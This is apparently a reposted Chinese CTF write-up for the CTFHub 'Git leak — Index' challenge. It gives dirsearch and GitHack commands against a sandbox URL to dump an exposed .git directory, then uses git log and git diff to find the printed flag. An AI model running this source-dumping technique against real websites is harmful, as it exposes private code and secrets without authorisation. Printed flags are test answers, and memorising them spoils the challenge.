CTFHub Git泄露—Index解题思路笔记
Posted 曹振国cc
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CTFHub Git泄露—Index解题思路笔记相关的知识,希望对你有一定的参考价值。
一、开启环境
1.使用dirsearch工具扫描目录
python3 dirsearch.py -u http://challenge-df934588d76028e3.sandbox.ctfhub.com:10080/
发现存在Git泄露
2.使用GitHack工具
python GitHack.py -u http://challenge-df934588d76028e3.sandbox.ctfhub.com:10080/.git
3.打开文件夹查看历史文件
git log
4.使用git diff比对文件
git diff 255498e8351aea1277b4f0d4e41c38aa0e5d2c65 //发现flag
五、FLAG
ctfhub{4bfd9b9f38c9b2fc0bf49339}
以上是关于CTFHub Git泄露—Index解题思路笔记的主要内容,如果未能解决你的问题,请参考以下文章